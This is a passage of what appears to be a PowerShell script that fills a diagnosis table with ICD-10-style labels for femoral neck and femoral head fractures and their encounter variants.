delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of unspecified femur","Displaced fracture of base of neck of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of right femur","Nondisplaced fracture of base of neck of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of left femur","Nondisplaced fracture of base of neck of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of neck of unspecified femur","Nondisplaced fracture of base of neck of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of right femur","Unspecified fracture of head of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of left femur","Unspecified fracture of head of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of head of unspecified femur","Unspecified fracture of head of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of right femur","Displaced articular fracture of head of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of left femur","Displaced articular fracture of head of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced articular fracture of head of unspecified femur","Displaced articular fracture of head of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of right femur","Nondisplaced articular fracture of head of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, subsequent encounter for closed fracture with delayed healing") + $null = 